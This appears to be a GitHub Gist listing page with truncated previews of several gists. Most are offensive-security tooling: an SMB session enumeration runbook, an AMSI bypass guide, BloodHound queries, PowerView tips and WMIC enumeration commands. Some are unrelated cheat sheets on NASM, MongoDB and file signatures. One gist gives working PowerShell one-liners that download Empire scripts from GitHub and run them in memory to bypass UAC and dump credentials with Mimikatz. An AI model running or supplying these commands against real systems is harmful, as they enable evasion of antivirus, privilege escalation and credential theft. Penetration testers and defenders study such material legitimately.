@gwhite-so
gwhite-so / session-enumeration-runbook.toml
Last active July 29, 2024 01:26
session-enumeration-runbook
[[testCases]]
id = "1.0.0"
name = '1.0.0 - Enumerate SMB Sessions from Third-Party Utility On Disk (NetSess)'
description = "Using the third party NetSess.exe utility to enumerate active SMB sessions"
tooling.name = "NetSess.exe"
tooling.references = [
"http://www.joeware.net/freetools/tools/netsess/"
]
executionSteps = [
'agent> upload -File NetSess.exe',
@D3Ext
D3Ext / amsi-bypass.md
Last active April 11, 2025 19:30
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all these techniques, you can simply try them by typing "Invoke-Mimikatz" into your PowerShell terminal; you'll notice that even if you haven't imported Mimikatz, it will detect that as malicious. But if AMSI is off or you avoid it, it will just say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed AMSI.

However, some methods may be detected by the AV, but most of them actually work without problem.

PowerShell downgrade

The first and worst way to bypass AMSI is downgrading the PowerShell version to 2.0.

@yezz123
yezz123 / Exploitation.md
Created May 24, 2021 12:09
Pentesting-Exploitation
@Gydo194
Gydo194 / args.asm
Last active January 27, 2025 18:11
Command Line arguments in NASM assembly on 64-bit Linux
; print all command line arguments (5 characters) and exit
; for 64-bit systems, Linux syscalls
; for simplicity, this program does not calculate the length of the strings.
; assemble with: nasm -f elf64 -o args args.asm
; link with: ld -o args args.o
sys_write equ 1 ; the linux WRITE syscall
sys_exit equ 60 ; the linux EXIT syscall
sys_stdout equ 1 ; the file descriptor for standard output (to print/write to)
@bradtraversy
bradtraversy / mongodb_cheat_sheet.md
Last active April 22, 2025 11:58
MongoDB Cheat Sheet

MongoDB Cheat Sheet

Show All Databases

show dbs

Show Current Database

@seajaysec
seajaysec / customqueries.json
Last active February 12, 2025 16:58
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@qti3e
qti3e / README.md
Last active April 1, 2025 12:38
List of file signatures and mime types based on file extensions
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 23, 2025 13:20
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@xorrior
xorrior / wmic_cmds.txt
Last active April 16, 2025 01:36
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct